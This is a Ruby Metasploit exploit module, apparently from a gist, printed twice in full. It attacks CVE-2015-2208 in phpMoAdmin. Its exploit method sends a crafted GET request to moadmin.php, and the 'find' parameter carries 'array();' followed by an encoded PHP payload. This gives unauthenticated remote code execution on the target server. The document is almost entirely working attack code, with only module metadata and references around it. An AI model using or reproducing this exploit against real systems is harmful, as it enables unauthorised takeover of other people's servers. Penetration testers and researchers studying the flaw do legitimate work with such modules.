brandonprry/phpmoadmin_rce.rb

## phpmoadmin_rce.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'rexml/document'

class Metasploit4 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'phpMoAdmin Unauthenticated Remote Code Execution',
      'Description'    => %q{
      This module exploits an unauthenticated RCE vuln in phpMoAdmin.
      },
      'Author'         => [
        'sp1nlock', #discovery
        'Brandon Perry <bperry.volatile[at]gmail.com>' #msf module
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://thehackernews.com/2015/03/phpMoAdmin-mongoDB-exploit.html'],
          ['URL', 'https://github.com/MongoDB-Rox/phpMoAdmin-MongoDB-Admin-Tool-for-PHP'],
          ['CVE', '2015-2208'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/zero-day-vulnerability-found-in-mongodb-administration-tool-phpmoadmin/']
        ],
      'Payload'	=>
        {
          'Space' => 21244,
          'DisableNops' => true,
          'BadChars' => "\n\r\x00"
        },
      'Targets'	=>
        [
          [ 'Automatic Target', { } ]
        ],
      'Privileged' => true,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'DisclosureDate' => 'Mar 3 2015',
      'DefaultTarget' => 0))

    register_options(
    [
      OptString.new('TARGETURI', [ true, 'The base path to moadmin.php', '/' ]),
    ], self.class)

  end

  def exploit
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'moadmin.php'),
      'vars_get' => {
        'db' => Rex::Text.rand_text_alpha(5),
        'action' => 'listRows',
        'collection' => Rex::Text.rand_text_alpha(5),
        'find' => 'array();'+payload.encoded
      }
    })
  end
end
	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'
	require 'rex'
	require 'rexml/document'

	class Metasploit4 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'phpMoAdmin Unauthenticated Remote Code Execution',
	'Description' => %q{
	This module exploits an unauthenticated RCE vuln in phpMoAdmin.
	},
	'Author' => [
	'sp1nlock', #discovery
	'Brandon Perry <bperry.volatile[at]gmail.com>' #msf module
	],
	'License' => MSF_LICENSE,
	'References' =>
	[
	['URL', 'http://thehackernews.com/2015/03/phpMoAdmin-mongoDB-exploit.html'],
	['URL', 'https://github.com/MongoDB-Rox/phpMoAdmin-MongoDB-Admin-Tool-for-PHP'],
	['CVE', '2015-2208'],
	['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/zero-day-vulnerability-found-in-mongodb-administration-tool-phpmoadmin/']
	],
	'Payload' =>
	{
	'Space' => 21244,
	'DisableNops' => true,
	'BadChars' => "\n\r\x00"
	},
	'Targets' =>
	[
	[ 'Automatic Target', { } ]
	],
	'Privileged' => true,
	'Platform' => ['php'],
	'Arch' => ARCH_PHP,
	'DisclosureDate' => 'Mar 3 2015',
	'DefaultTarget' => 0))

	register_options(
	[
	OptString.new('TARGETURI', [ true, 'The base path to moadmin.php', '/' ]),
	], self.class)

	end

	def exploit
	send_request_cgi({
	'uri' => normalize_uri(target_uri.path, 'moadmin.php'),
	'vars_get' => {
	'db' => Rex::Text.rand_text_alpha(5),
	'action' => 'listRows',
	'collection' => Rex::Text.rand_text_alpha(5),
	'find' => 'array();'+payload.encoded
	}
	})
	end
	end